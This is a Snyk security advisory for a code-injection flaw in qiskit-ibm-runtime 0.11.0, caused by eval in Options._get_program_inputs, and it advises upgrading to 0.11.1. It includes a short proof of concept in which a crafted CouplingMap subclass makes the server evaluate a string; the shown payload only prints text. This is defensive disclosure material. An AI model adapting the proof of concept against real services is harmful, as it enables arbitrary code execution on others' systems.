Uncontrolled Recalculation of Data to Code ('Code Injection') Affecting qiskit-ibm-runtime package, versions [0.11.0,0.11.1)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-QISKITIBMRUNTIME-6475237
- published21 Mar 2024
- disclosed20 Mar 2024
- creditihincks
Introduced: 20 Mar 2024
CVE NOT AVAILABLE CWE-627 (opens in a new tab)How to fix?
Upgrade qiskit-ibm-runtime to version 0.11.1 or higher.
Overview
qiskit-ibm-runtime is an IBM Quantum client for Qiskit Runtime.
Affected versions of this package are vulnerable to Uncontrolled Recalculation of Data to Code ('Code Injection') due to the usage of eval method in Options._get_program_inputs. An attacker can execute arbitrary code by using a specifically crafted object that, when processed by the eval method, leads to code execution. This issue arises because Options are used server-side, potentially exposing runtime containers to arbitrary code injection.
PoC
from qiskit import transpiler
class BadActor(transpiler.CouplingMap):
def __str__(self):
return "print('external code')"
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit
cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))
bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()
with Session(service=service, backend="ibmq_qasm_simulator") as session:
sampler = Sampler(session=session, options=options).run(bell)